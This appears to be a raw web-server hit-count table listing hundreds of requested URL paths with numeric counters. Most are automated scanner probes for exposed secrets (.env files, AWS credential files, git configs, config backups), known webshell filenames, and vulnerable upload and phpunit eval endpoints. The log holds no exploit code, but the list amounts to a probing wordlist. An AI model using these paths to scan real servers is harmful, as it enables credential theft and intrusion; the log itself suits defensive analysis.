0 0 29001894 0 /old 1 0 0 0 1 0 0 29346262 0 0 29346262 0 /common.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /resources/global/plugins/jquery-file-upload/server/php/ 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /v2/.env 1 0 0 0 10 0 0 29387345 0 0 29346262 0 /7.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/Admin.html 1 0 0 0 8 0 0 29415978 0 0 29376908 0 /as.php 1 0 0 0 1 0 0 28986922 0 0 28986922 0 /application/.env?164.92.77.30 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /gof.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /files.php 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /zde.php 1 0 0 0 3 0 0 29415979 0 0 29400764 0 /juuuu.php 1 0 0 0 9 0 0 29415978 0 0 29343317 0 /m.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /upload/wp-info.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /beta/.env 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /admin/.env.bak 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /zcanp.php 1 0 0 0 2 0 0 29388817 0 0 29356484 0 /php_info.php 1 0 0 0 2 0 0 29364908 0 0 29346543 0 /api/swagger.json 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /public/info.php 1 1 0 0 0 28641367 0 0 28641367 0 0 2137 /_autoindex/assets/js/tablesort.js 1 0 0 0 2 0 0 29388817 0 0 29175678 0 /wp-config.php.bak 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /helper.js 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /.well-known/admin.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /kesa.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /app/config/parameters.yml 1 0 0 0 6 0 0 29389715 0 0 29340771 0 /111.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /ggs.php 1 0 0 0 13 0 0 29415979 0 0 29370559 0 /css/index.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-includes/fonts/index.php?p= 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /tj.php 1 0 0 0 5 0 0 29356484 0 0 29175678 0 /vendor/.env 1 0 0 0 4 0 0 29389715 0 0 29352213 0 /ss.php 1 0 0 0 2 0 0 29381255 0 0 29381150 0 /ctex1.php 1 0 0 0 5 0 0 29400764 0 0 29376909 0 /wp-includes/theme-compat/chosen.php 1 0 0 0 13 0 0 29387345 0 0 29335672 0 /thh.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /scripts/info.php 1 0 0 0 14 0 0 29387345 0 0 29335672 0 /2.php 1 0 0 0 6 0 0 29356484 0 0 29175678 0 /app/.env 1 0 0 0 2 0 0 28811619 0 0 28737541 0 /.git/config?104.166.80.49 1 0 0 0 9 0 0 29389715 0 0 29311382 0 /an.php 1 0 0 0 4 0 0 29415979 0 0 29335672 0 /radio.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /modules/.env.old 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config.bak 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /bv3.php 1 0 0 0 8 0 0 29404800 0 0 29335553 0 /fw.php 1 0 0 0 10 0 0 29385019 0 0 29335672 0 /he.php 1 0 0 0 4 0 0 29345798 0 0 29335672 0 /sec.php 1 0 0 0 2 0 0 29268042 0 0 29175678 0 /xampp/phpinfo.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /woso.php 1 0 0 0 1 0 0 29323749 0 0 29323749 0 /media/system/js/core.js 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /mail/.env 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /beence.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/v1/admin/env 1 0 0 0 7 0 0 29400764 0 0 29346262 0 /02.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /vendor/nikic/php-parser/parser.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /.envs/.production/.django 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php.backup 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php.bak 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /bootstrap/cache/config.php 1 0 0 0 3 0 0 29415979 0 0 29335553 0 /we2.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /public/javascript/jquery.upload/server/php/ 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /20ojy.php 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /a3.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /file3.php 1 0 0 0 3 0 0 29361975 0 0 29361975 0 /indoxploit.php 1 0 0 0 13 0 0 29385019 0 0 29335672 0 /geck.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /bqcheck.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /web/info.php 1 0 0 0 19 0 0 28816806 0 0 28725477 0 /favicon.ico?104.166.80.49 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /scripts/init_smtp.sh 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /te.php 1 5 0 0 9 28802838 0 29352213 28802836 0 28770893 2790 /index.php 1 3 3 0 0 28641367 0 0 28641362 0 0 1179 /leee-articles-school/process.html 1 0 0 0 9 0 0 29400763 0 0 29365203 0 /max.php 1 0 0 0 6 0 0 29415978 0 0 29335553 0 /fwe.php 1 0 0 0 4 0 0 29387345 0 0 29311382 0 /filei.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /config/secrets.json 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /ze.php 1 0 0 0 3 0 0 29286971 0 0 29225109 0 /wiki 1 0 0 0 5 0 0 29389715 0 0 29311382 0 /gold.php 1 0 0 0 4 0 0 29389715 0 0 29343317 0 /shlo.php 1 0 0 0 9 0 0 29330824 0 0 29284784 0 /robots.txt?3.17.57.190 1 0 0 0 3 0 0 29378467 0 0 29335672 0 /c.php 1 4 0 0 0 28729323 0 0 28729323 0 0 348 /.well-known/acme-challenge/N0Ohz7mR0gw9bdUvah0lfJkwZq6SFitJl44DrKvT6go 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /src/.env 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /gi.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /cmd.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/paypal.php 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /ddd.php 1 0 0 0 9 0 0 29389628 0 0 28994986 0 /media/wp-includes/wlwmanifest.xml 1 0 0 0 8 0 0 29381149 0 0 29340771 0 /030.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 / colors.php 1 0 0 0 4 0 0 29404800 0 0 29395728 0 /ww2.php 1 0 0 0 3 0 0 29397689 0 0 29376908 0 /post.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /zc-903.php 1 0 0 0 1 0 0 29415978 0 0 29415978 0 /EM.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /react-app/.env.production 1 0 0 0 3 0 0 29030170 0 0 28729910 0 /wp-admin/setup-config.php?step=1 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /admin/upload/css.php 1 0 0 0 1 0 0 29381150 0 0 29381150 0 /wp-ana.php 1 0 0 0 2 0 0 29388817 0 0 29356484 0 /dev/info.php 1 4 0 0 0 28817163 0 0 28817163 0 0 348 /.well-known/acme-challenge/py40wK78RZdT-INaOP53X_IbfYgK0dsQFbiiX-S0n8g 1 0 0 0 1 0 0 29376909 0 0 29376909 0 /.well-known/acme-challenge/mariju.php 1 0 0 0 9 0 0 29385019 0 0 29344750 0 /enclas.php 1 0 0 0 2 0 0 29374988 0 0 29220645 0 /.git/FETCH_HEAD 1 0 0 0 2 0 0 29388817 0 0 29190016 0 /error.log 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws.env 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /func.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.git/index 1 1 0 0 0 28641367 0 0 28641367 0 0 1170 /_autoindex/assets/css/autoindex.css 1 0 0 0 2 0 0 29268042 0 0 29175678 0 /.vscode/.env 1 0 0 0 2 0 0 29228317 0 0 29223859 0 /style.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /djfksr4.php 1 0 0 0 3 0 0 29220646 0 0 29175678 0 /config.yml 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /lib/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /includes/info.php.save 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /utf88.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /.AWS_/credentials 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/backup/ 1 0 0 0 7 0 0 29171690 0 0 29001894 0 /new 1 0 0 0 5 0 0 29389715 0 0 29383262 0 /fm.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /pomo.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /ev.php 1 0 0 0 4 0 0 29381150 0 0 29370559 0 /sck.php 1 0 0 0 2 0 0 29381255 0 0 29346262 0 /mms.php 1 0 0 0 7 0 0 29385019 0 0 29335672 0 /.well-known/acme-challenge/about.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /database.bak 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wolv2.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /laravel/info.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /.npmrc 1 0 0 0 3 0 0 29387345 0 0 29335553 0 /zt2.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /.github/workflows/ 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /kyc/.env 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test/info.php 1 0 0 0 4 0 0 29159382 0 0 28974063 0 /assets/vendor/jquery.filer/php/readme.txt 1 0 0 0 1 0 0 29228729 0 0 29228729 0 /gdftps.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /x7.php 1 0 0 0 4 0 0 29372537 0 0 29358297 0 /xleet-shell.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/images/ 1 0 0 0 9 0 0 29381255 0 0 29335672 0 /system_log.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /gradle.properties 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /about/function.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /application/.env.bak 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /f2.php 1 0 0 0 6 0 0 29388817 0 0 29172736 0 /.aws/credentials 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /conn.php 1 0 0 0 7 0 0 29385019 0 0 29335672 0 /fffff.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /xm.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /thesmartestx.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /tinymce/filemanager/dialog.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /Y.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /mtvcrew.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp1.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /500.php 1 0 0 0 6 0 0 29400764 0 0 29340771 0 /bless3.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /new/.env.local 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /dcc.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /uploat.php 1 0 0 0 5 0 0 29404800 0 0 29361975 0 /ifm.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /alfaindex.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /assets/scripts/filemanager/dialog.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /wp-includes/buy.php 1 0 0 0 10 0 0 29385019 0 0 29340771 0 /indo.php 1 0 0 0 4 0 0 29381150 0 0 29352213 0 /gecko.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /dev/info.php.save 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /admir.php 1 0 0 0 12 0 0 29415979 0 0 29335672 0 /2clas.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /server.js 1 0 0 0 2 0 0 29387344 0 0 29383262 0 /rh.php 1 0 0 0 1 0 0 29220651 0 0 29220651 0 /uat/api/config 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /app/.git/config 1 0 0 0 1 0 0 29415978 0 0 29415978 0 /z60.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phptest.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /vvvv.php 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /mpvloi.php 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /wp-content/themes/about.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /doc.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /c99.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp670.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info.php.swp 1 0 0 0 8 0 0 29388817 0 0 29175678 0 /.env.example 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /v2/_catalog 1 0 0 0 4 0 0 29381150 0 0 29370559 0 /xrp.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /site-backup/ 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /site/info.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /api/config.env 1 0 0 0 2 0 0 28720443 0 0 28694902 0 /.git/config?195.211.77.140 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /700.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /mytest/astech_robot.js 1 0 0 0 5 0 0 29381150 0 0 29335553 0 /sto.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /api/objects/codes.php.save 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /lib/.env.save 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /T.php 1 0 0 0 2 0 0 29220645 0 0 29190016 0 /.gitlab-ci.yml 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info.php.tmp 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /secret.js 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /storage/.env.save 1 0 0 0 3 0 0 29289461 0 0 29175678 0 /cron/.env 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /api/.env.save 1 1 0 0 0 28641367 0 0 28641367 0 0 394 /_autoindex/assets/icons/file-text.svg 1 0 0 0 5 0 0 29389715 0 0 29311382 0 /lc.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /oxse.php 1 0 0 0 2 0 0 29378467 0 0 29376909 0 /bak.php 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /production/.env.production 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /db_backup/ 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /byp.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /app_dev.php/_profiler/phpinfo 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /Auth.php 1 0 0 0 1 0 0 29220650 0 0 29220650 0 /tmp/sendgrid_access.env 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.gitlab-ci.yml.old 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /wp-content/.env 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /pow.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /pu.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /dng.php 1 0 0 0 5 0 0 29171690 0 0 29001894 0 /backup 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /thumb.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wcas.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /admin/controllers/merchant.js 1 0 0 0 2 0 0 29361975 0 0 29361975 0 /s46v1.php 1 0 0 0 3 0 0 29346261 0 0 29285439 0 /xc.php 1 0 0 0 1 0 0 29381255 0 0 29381255 0 /2x.php 1 0 0 0 4 0 0 29389715 0 0 29335553 0 /naxc.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /O.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /awstats/.env 1 0 0 0 1 0 0 29372583 0 0 29372583 0 /ahy66.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /huangs.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /api/shared/config.env 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /www/info.php.save 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /src/.env.old 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /track.php 1 0 0 0 29 0 0 29402830 0 0 28905525 0 /test/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /system/.env.bak 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /s/5313e2731323e27383e2439313/_/ 1 0 0 0 12 0 0 29385019 0 0 29335672 0 /file88.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /007.php 1 0 0 0 6 0 0 29389715 0 0 29365203 0 /blox.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /wp-includes/widgets/include.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test.php.bak 1 0 0 0 8 0 0 29415979 0 0 29340771 0 /gifclass.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /vendor/.env.old 1 0 0 0 1 0 0 29220649 0 0 29220649 0 /staging/api/keys 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws-config.js 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /development/.env 1 0 0 0 2 0 0 29381256 0 0 29378467 0 /jp.php 1 0 0 0 9 0 0 29395728 0 0 29370559 0 /bless.php 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /node_modules/jquery-file-upload/package.json 1 0 0 0 3 0 0 29030170 0 0 28729910 0 /wordpress/wp-admin/setup-config.php?step=1 1 0 0 0 13 0 0 29385019 0 0 29335672 0 /inde.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /12ff.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /assets/plugins/kcfinder/upload.php 1 0 0 0 9 0 0 29374988 0 0 29175678 0 /.git/HEAD 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /sarang.php 1 0 0 0 4 0 0 29289461 0 0 29175678 0 /apps/.env 1 0 0 0 1 0 0 29220649 0 0 29220649 0 /staging/config.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp-the1me.php 1 0 0 0 8 0 0 29385019 0 0 29335672 0 /build.php 1 0 0 0 18 0 0 29387345 0 0 29285439 0 /pp.php 1 2 0 0 0 28802839 0 0 28802839 0 0 705 /editor.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /deploy/aws_deploy.sh 1 0 0 0 9 0 0 29388817 0 0 29190016 0 /config/.env 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /.well-known/log.php 1 0 0 0 9 0 0 29389715 0 0 29285439 0 /wp-gr.php 1 0 0 0 1 0 0 29381255 0 0 29381255 0 /asus.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /themes/.env.old 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /lopst.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /config.bak.php 1 0 0 0 1 0 0 29346262 0 0 29346262 0 /d5.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /admin/api/keys 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wg.php 1 0 0 0 1 0 0 29415978 0 0 29415978 0 /atx.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /J.php 1 0 0 0 5 0 0 29387344 0 0 29311382 0 /num.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /controller/api/post.js 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /coaster/jquery/gallery-upload/server/php/ 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-includes/SimplePie/wp-login.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /opop.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /lib/jquery-file-upload/server/php/ 1 0 0 0 5 0 0 29415978 0 0 29395728 0 /randkeyword.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /app/.env.old 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /orm.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /hly.php 1 0 0 0 2 0 0 29361975 0 0 29361975 0 /uploader.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/style.css 1 0 0 0 3 0 0 29387345 0 0 29372583 0 /dex.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /class-config.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /cronlab/.env 1 0 0 0 12 0 0 29385019 0 0 29335672 0 /vee.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /dev/.env 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /fmk.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /yas.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /v5.php 1 0 0 0 8 0 0 29404800 0 0 29311382 0 /ot.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /bes.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /wawja.php 1 0 0 0 30 0 0 29402830 0 0 28905524 0 /wp/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29268042 0 0 29268042 0 /sendgrid.env 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /scripts/phpinfo.php.save 1 0 0 0 1 0 0 29019479 0 0 29019479 0 /?<play>withme</> 1 0 0 0 1 0 0 29220650 0 0 29220650 0 /tmp/laravel.env 1 0 0 0 7 0 0 29387345 0 0 29335672 0 /epinyins.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/backend/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29146878 0 0 29146878 0 /wp-login.php?3.17.57.190 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /wan.php 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /.well-known/index.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /core/Datavase/.env 1 0 0 0 10 0 0 29385019 0 0 29335672 0 /wb.php 1 0 0 0 12 0 0 29385019 0 0 29335672 0 /ut.php 1 0 0 0 2 0 0 29387344 0 0 29379197 0 /file17.php 1 0 0 0 6 0 0 29387345 0 0 29311382 0 /ava.php 1 0 0 0 4 0 0 29389715 0 0 29335553 0 /pass.php 1 0 0 0 5 0 0 29370559 0 0 29335672 0 /about3.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /E.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /static/js/main.js 1 0 0 0 7 0 0 29385019 0 0 29365203 0 /image.php 1 0 0 0 5 0 0 29325301 0 0 29142716 0 /.git/config?3.17.57.190 1 0 0 0 1 0 0 29098866 0 0 29098866 0 /sftp-config.json 1 0 0 0 8 0 0 29404800 0 0 29311382 0 /co.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /xxa.php 1 0 0 0 3 0 0 29387345 0 0 29311382 0 /sad.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /tor.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /fex.php 1 0 0 0 4 0 0 29352213 0 0 29340771 0 /kaza.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /backup/aws-keys.bak 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /worksec.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /js/kcfinder/upload.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /jsp.php 1 0 0 0 7 0 0 29381149 0 0 29340771 0 /des.php 1 0 0 0 1 0 0 29376909 0 0 29376909 0 /bless19.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/lx.php 1 0 0 0 6 0 0 29385019 0 0 29311382 0 /vanta.php 1 0 0 0 2 0 0 28770670 0 0 28738948 0 /robots.txt?104.166.80.49 1 0 0 0 47 0 0 29388817 0 0 28641362 0 /.env 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /c4.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/lib/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /saiga.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /ooaiyc.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /mpxct.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /667.php 1 0 0 0 1 0 0 29346261 0 0 29346261 0 /bild.php 1 0 0 0 8 0 0 29415979 0 0 29370559 0 /wp-includes/block-patterns/index.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /1vbqo.php 1 0 0 0 3 0 0 29387345 0 0 29379198 0 /rsnu.php 1 0 0 0 3 0 0 29415979 0 0 29400764 0 /ioxi-o1.php 1 0 0 0 1 0 0 29346262 0 0 29346262 0 /hex.php 1 0 0 0 4 0 0 29404800 0 0 29395728 0 /qqq.php 1 0 0 0 8 0 0 29381255 0 0 29346262 0 /v.php 1 0 0 0 6 0 0 29397689 0 0 29376908 0 /dropdown.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /.well-known/pki-validation/alfacgiapi/wawe_gH298.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /ico.php 1 0 0 0 9 0 0 29415978 0 0 29365203 0 /wp-admin/js/wp-conflg.php?p= 1 0 0 0 4 0 0 29400764 0 0 29361975 0 /kairolin.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.output/env_staging.tar.gz 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /service/email_service.py 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /old/.env.aws 1 0 0 0 3 0 0 29400763 0 0 29395728 0 /wp-content/plugins/dummyyummy/wp-signup.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /git/.git/config 1 0 0 0 7 0 0 29389715 0 0 29311382 0 /ahax.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /bkxzo.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info1.php 1 0 0 0 6 0 0 29397689 0 0 29335672 0 /default.php 1 0 0 0 1 0 0 29220650 0 0 29220650 0 /static/js/*.js 1 0 0 0 2 0 0 29344750 0 0 29340771 0 /haa.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /admin/phpinfo.php.save 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /Makefile 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/libs/jquery-file-upload/server/php/ 1 0 0 0 5 0 0 29415978 0 0 29395728 0 /class-t.api.php 1 0 0 0 4 0 0 29381150 0 0 29370559 0 /fesa.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /va.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /lib/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /class.php 1 0 0 0 6 0 0 29404800 0 0 29376908 0 /article.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/css/ 1 0 0 0 1 0 0 28641362 0 0 28641362 0 /cgi-bin/ 1 0 0 0 2 0 0 29397689 0 0 29395728 0 /wp-includes/css/kses.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /aw.php 1 0 0 0 5 0 0 29387345 0 0 29346262 0 /456.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /backup/phpinfo.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /V3.php 1 4 0 0 0 28905003 0 0 28905003 0 0 348 /.well-known/acme-challenge/flWkdRPi7T5m5EAyLqt7vLuoCE2p6Q3OfuK3NEwwNBo 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /_profiler/phpinfo/info.php 1 0 0 0 6 0 0 29415978 0 0 29376908 0 /click.php 1 0 0 0 7 0 0 29415979 0 0 29352213 0 /wp-content/themes/twentytwentytwo/index.php?p= 1 0 0 0 4 0 0 28770897 0 0 28770893 0 /js/ 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /hn.php 1 1 0 0 0 29346542 0 0 29346542 0 0 64 /.well-known/acme-challenge/QFDB1VBUJBA9VDB9WJCX5BNBJAV3MQUQ?3.17.57.190 1 0 0 0 4 0 0 29397689 0 0 29376909 0 /wp-admin/includes/xmrlpc.php?p= 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php.swp 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /wefile.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.circleci/config.yml 1 0 0 0 3 0 0 29397689 0 0 29376909 0 /wp-includes/Requests/Text/admin.php 1 0 0 0 2 0 0 29190016 0 0 29175678 0 /aws/credentials 1 0 0 0 2 0 0 29356483 0 0 29356483 0 /.env.swp 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /class629.php 1 0 0 0 1 0 0 29397689 0 0 29397689 0 /wp-wlx.php 1 0 0 0 13 0 0 29415978 